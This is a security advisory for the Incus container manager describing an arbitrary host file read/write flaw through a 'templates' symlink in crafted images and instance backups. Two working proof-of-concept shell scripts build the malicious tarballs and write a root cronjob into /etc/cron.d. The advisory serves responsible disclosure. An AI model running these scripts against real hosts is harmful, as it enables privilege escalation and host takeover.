### Summary

A specially crafted image or instance backup can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution.


### Details

For container images, `internal/server/storage/utils.go` calls `archive.Unpack(imageFile, destPath, ...)`. The tar extraction path in `shared/archive/archive.go` excludes device nodes, but it does not reject a top-level `templates` symlink.

For instance backups, `internal/server/storage/drivers/driver_dir_volumes.go:rsync.LocalCopy` uses argument `-a` (archive mode), but does not add `--safe-links`. This allows a top-level `templates` symlink.

In practice, this allows a malicious actor to access an arbitrary directory and edit arbitrary files in it.


### PoC

#### Malicious container image

Below, the templates directory is mapped to `/etc/cron.d` on the host, but it can be mapped anywhere. After that, create a cronjob to run `id` as root.

```
#!/bin/sh
set -eu

tmpdir=$(mktemp -d)
cleanup() {
rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP

mkdir -p "${tmpdir}/img/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/templates"
cat<<__EOF__>"${tmpdir}/img/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
description: PoC templates symlink host afrw
__EOF__

cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c * >../afrw-image-templates-symlink.tar
incus image import ../afrw-image-templates-symlink.tar --alias afrw-image-templates-symlink
incus init afrw-image-templates-symlink afrw-image-templates-symlink

incus config template ls afrw-image-templates-symlink

# read
#incus config template show afrw-image-templates-symlink $FILENAME

# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-image-templates-symlink poc-32
#incus config template edit afrw-image-templates-symlink poc
```

#### Malicious instance backup


Below, the templates directory is mapped to `/etc/cron.d` on the host, but it can be mapped anywhere. After that, create a cronjob to run `id` as root.

```
#!/bin/sh
set -eu

tmpdir=$(mktemp -d)
cleanup() {
rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP

mkdir -p "${tmpdir}/img/backup"
cat<<__EOF__>"${tmpdir}/img/backup/index.yaml"
name: afrw-backup-templates-symlink
backend: dir
pool: default
type: container
optimized: false
__EOF__

mkdir "${tmpdir}/img/backup/container"
cat<<__EOF__>"${tmpdir}/img/backup/container/backup.yaml"
container:
name: afrw-backup-templates-symlink
architecture: x86_64
type: container
status: Stopped
status_code: 102
stateful: false
ephemeral: false
profiles:
- default
config:
volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
expanded_config:
volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
devices: {}
expanded_devices:
root:
path: /
pool: default
type: disk
created_at: "2024-01-01T00:00:00Z"
last_used_at: "2024-01-01T00:00:00Z"
volume:
name: afrw-backup-templates-symlink
type: container
content_type: filesystem
config: {}
pool:
name: default
driver: dir
config: {}
__EOF__

cat<<__EOF__>"${tmpdir}/img/backup/container/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
description: afrw-backup-templates-symlink
__EOF__

mkdir "${tmpdir}/img/backup/container/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/backup/container/templates"

cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c backup >../afrw-backup-templates-symlink.tar
incus import ../afrw-backup-templates-symlink.tar afrw-backup-templates-symlink

incus config template ls afrw-backup-templates-symlink

# read
#incus config template show afrw-backup-templates-symlink $FILENAME

# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-backup-templates-symlink poc-32
#incus config template edit afrw-templates-symlink poc
```

### Impact

Arbitrary file read and write on the host via unsanitized symlink; possibly leading to command execution.